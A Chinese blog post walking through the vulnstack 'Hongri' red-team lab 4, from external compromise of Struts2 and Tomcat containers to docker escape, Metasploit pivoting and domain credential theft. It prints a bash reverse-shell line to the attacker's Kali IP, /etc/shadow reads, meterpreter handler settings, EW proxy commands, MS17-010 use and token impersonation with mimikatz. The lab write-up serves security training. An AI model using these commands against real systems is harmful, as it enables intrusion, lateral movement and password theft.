红队打靶,红日靶场系列,红日靶场4

最新推荐文章于 2024-02-23 20:10:32 发布
最新推荐文章于 2024-02-23 20:10:32 发布
阅读量365 收藏
点赞数
分类专栏: 红队打靶 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47289634/article/details/131660749
版权

文章目录

环境搭建:

在这里插入图片描述

攻击机:
真实机win10
kali : 192.168.0.128
靶机:
web:192.168.183.130, 192.168.0.129
dc: 192.168.183.129
win7:192.168.183.128
启动docker环境,输入sudo后提示输入密码,输入ubuntu即可

cd /home/ubuntu/Desktop/vulhub/struts2/s2-045
sudo docker-compose up -d
cd /home/ubuntu/Desktop/vulhub/tomcat/CVE-2017-12615/
sudo docker-compose up -d
cd /home/ubuntu/Desktop/vulhub/phpmyadmin/CVE-2018-12613/
sudo docker-compose up -d

外网渗透:

先用RG来个端口扫描,探测到几个端口和三个服务,phpmyadmin,tomcat,struts2
在这里插入图片描述

Struts2

访问2001端口可以看到个struts2的文件上传页面,直接上工具扫一下看看是否存在漏洞,发现一大堆

在这里插入图片描述
点击执行命令,查询系统进程的cgroup信息,看看目标是否是docker环境
在这里插入图片描述
很明显目标由docker搭建,看看是否可以进行docker逃逸
在kali中开启一个监听
在这里插入图片描述

在struts2内执行反弹shell的命令 bash -i &>/dev/tcp/192.168.0.128/8888 <&1
在这里插入图片描述
kali成功接收shell
在这里插入图片描述
docker逃逸
这里出不去,看下个端口

参考这篇文章:https://xz.aliyun.com/t/12495

phpmyadmin

phpmyadmin提权可以参考红日1

https://editor.csdn.net/md/?articleId=131577749

tomcat

扫一下,发现存在一个CVE-2017-12615具体可以一下这篇文章:tomcat系列漏洞复现
在这里插入图片描述
使用put方法写入一个webshell
在这里插入图片描述
冰蝎连接
在这里插入图片描述
命令执行,发现可以挂载光盘
在这里插入图片描述
将真实机挂在到docker里面

mkdir /test
mount /dev/sda1 /test
cd /test
ls -al

可以看到真实机的一些东西
在这里插入图片描述
执行下面命令可以看到所有用户的密码信息

cat /etc/passwd
cat /etc/shadow

这里可以在相同版本的ubuntu中进行创建用户密码,覆盖现有的密码,之后进行ssh连接,看不到密码信息的用哥斯拉连接
在这里插入图片描述
连接ssh后进行提权
在这里插入图片描述
root 下面添加一个当前登录的用户,权限写成和root一样
在这里插入图片描述
权限变成了root
在这里插入图片描述

内网渗透

msf上线

拿到主机权限之后发现有两块网卡,183网段使用kali无法通信,肯定为内网地址
在这里插入图片描述
使用kali生成后门,并用xshell上传到ubuntu
在这里插入图片描述
并赋予执行权限
在这里插入图片描述
打开msf,配置、监听、执行

use exploit/multi/handler  #使用监听模块
set payload linux/x64/meterpreter/reverse_tcp #使用和木马相同的payload
set lhost 192.168.0.128 #kaili 的ip
set lport 4444 #木马的端口
run #执行

上线成功
在这里插入图片描述

建立代理

在msf里添加路由

run post/multi/manage/autoroute

在这里插入图片描述
这里用到一款工具,建立代理的话比较方便

https://github.com/idlefire/ew

在kali上执行命令

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

在这里插入图片描述

在目标主机上上传ew_for_linux64,执行命令

./ew_for_linux64 -s rssocks -d 192.168.48.136 -e 1234

在这里插入图片描述
创建成功
在这里插入图片描述
用kali ping一下内网,看看代理是否创建成功
在这里插入图片描述

内网信息收集

可以看到kali成功打入内网,使用msf模块进行内网主机探测

use auxiliary/scanner/discovery/udp_probe
set RHOSTS 192.168.183.0/24
set THREADS 15
run

发现两台主机
在这里插入图片描述
在这里插入图片描述
使用nmap扫一下,发现445端口都开着,试一下ms17010
在这里插入图片描述
你妹的,坑死了,这里利用ms17010攻击的时候要把火绒退了,不然会拦截,这里成功拿下win7
在这里插入图片描述
server的话可以攻击成功,但是创建不了会话
解决Kali中MSF Console拿到Windows shell后显示中文乱码问题,在拿到的Windows shell中输入如下命令,设置活动代码页字符为UTF-8编码。

chcp 65001

在这里插入图片描述

密码获取

提权:使用meterpreter里面使用令牌窃取SYSTEM权限之后再进行mimikatz密码进行抓取

use incognito
impersonate_token "NT AUTHORITY\SYSTEM"

在这里插入图片描述
成功获取win7在域里的明文密码
在这里插入图片描述
在这里插入图片描述

总结

有些过程思路很清晰,但是做起来各种问题,总结:还是带练
在这里插入图片描述

青衫木马牛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
靶场4
dyx0910的博客
06-29 2335
靶场4
靶场(四)
qq_58091216的博客
05-03 1126
靶场(三)环境有点问题,后面在补。
靶场
qq_50696533的博客
12-29 3429
靶场4大家好安全靶场(四)已经出来,本次靶场渗透反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞,希望大家多多利用。靶场学习路径,可参考 struts2 漏洞利用 tomcat 漏洞利用 phpmyadmin getshell docker逃逸 ms14-068 ssh密钥利用 流量转发 历史命令信息泄露 域渗透。利用永恒之蓝获得win7 mimikatz抓取密码 利用Kerberos 域用户提权漏洞获得域
靶场 4
qq_64201116的博客
01-07 1276
我这里的思路就是通过 certutil 命令下载木马到域控,再通过一层端口转发到我们的 kali,把木马流量转发到我们的 kali 即可上线成功。所以我们就写计划任务了,这里好像是远程机器的 ssh 开启 Public 那个选项,可以写公钥,这里还是利用计划任务演示吧。其实这里可以直接放到 ubuntu 的 web 目录下直接让 dc 访问也可以,当时做的时候传 HFS 方便点。这里是可以执行 phpinfo 的,但是无法执行 system 或者其他 getshell 语句,挺奇怪的。
2020年安全星火沙龙PPT.zip
02-25
《2020年安全星火沙龙PPT》是一个关于网络安全的专题研讨会资料集,其中包含了多个主题演讲的PDF文件。这个压缩包揭示了一系列关键的网络安全领域知识点,包括但不限于: 1. **Dotnet Hacking & Detection** - ...
攻防手册,攻防教程
最新发布
04-20
攻防教程是指针对网络和系统安全的实践性培训,旨在模拟真实的攻击场景并提供相关的防御技术。是一个模拟攻击团,通过模拟真实的黑客攻击来测试组织的安全性,而蓝则是负责防御和应对这些攻击的团。 ...
渗透打点工具-FindUpload
03-07
渗透打点工具-FindUpload】 在网络安全领域,渗透测试是模拟黑客攻击行为,以评估组织防御能力的一种重要方法。FindUpload作为一款打点工具,其核心功能在于帮助渗透测试专家有效地查找和定位网络...
计算机网络安全技术:其他靶场介绍.pdf
05-12
实战系列靶场是由安全团建立的一系列复杂环境,目前包括七个完整的场景,如沃尔玛安全靶场。这些靶场不仅包含了Web安全的元素,还提供了CAMS(可能是指网络应用安全管理服务)等对外接口。然而,用户可能...
(14条消息) 安全vulnstack-ATT&CK实战系列 实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 安全vulnstack-ATT&CK实战系列 实战(一)_Ys3ter的博客-CSDN博客.html
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由精心编制,凭借多年经验于本文档
ATT&CK评估(靶场四)
weixin_45682839的博客
04-28 5436
ATT&CK评估(靶场四)通关攻略,涉及知识包括: Struts2漏洞利用、phpmyadmin getshell、tomcat 漏洞利用、ms17_010、docker逃逸、ms14_068、ssh密钥利用、流量转发、横向移动、内网渗透等。
靶场第四关
红队是青春
12-02 3456
靶场第四关 一、环境配置 大家好安全靶场(四)已经出来,本次靶场渗透反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞。 靶场学习路径,可参考 st漏洞利用 phpmyadmin getshell tomcat 漏洞利用 docker逃逸 ms14-068 ssh密钥利用 流量转发 历史命令信息泄露 域渗透 WEB-Ubuntu docker开启 sudo docker
靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))
qq_45290991的博客
10-17 2518
文章目录 环境搭建官方描述外网信息收集与利用struts2Tomcat任意文件写入 phpmyadminCVE-2018-12613 远程文件包含任意命令执行包含session文件 docker 逃逸利用特权模式逃逸 权限维持ssh软...
靶场4-笔记
m0_60823533的博客
09-27 287
靶场4,Docker逃逸,PhpMyadmin文件包含,Struts2命令执行,tomcat任意文件上传
评估四靶场
woshicainiao666的博客
02-23 1047
大大滴靶子
靶机vulnstack04【半总结】
qq_45300786的博客
10-06 512
这次环境是3台机器, web服务器:000000 、DC:000000ydc. 、 win7 web服务器改ip有点麻烦,因为需要root用户才能改,给的ubuntu改不了。 所以我就进入高级模式下,修改了root用户的密码 关于虚拟机没有ipIP解决方案 然后再切到root用户修改ip win7 这台机器最麻烦,因为UAC开启最高模式,所以无论执行什么东西,都要输入账号密码 这里我的思路是先用msf的永恒之蓝拿到shell,然后再用下面这个链接去绕过UAC,提权为system权限。然后利用这个sy
靶场】vulnstack4-完整渗透过程
信安是不可或缺的一部分!
10-19 779
提示:以下是本篇文章正文内容,下面案例可供参考。
靶场php study
08-24
- *1* *2* *3* [内网渗透靶场1(ATK&CK评估实战靶场一)](https://blog.csdn.net/qq_45780190/article/details/122951320)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

青衫木马牛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值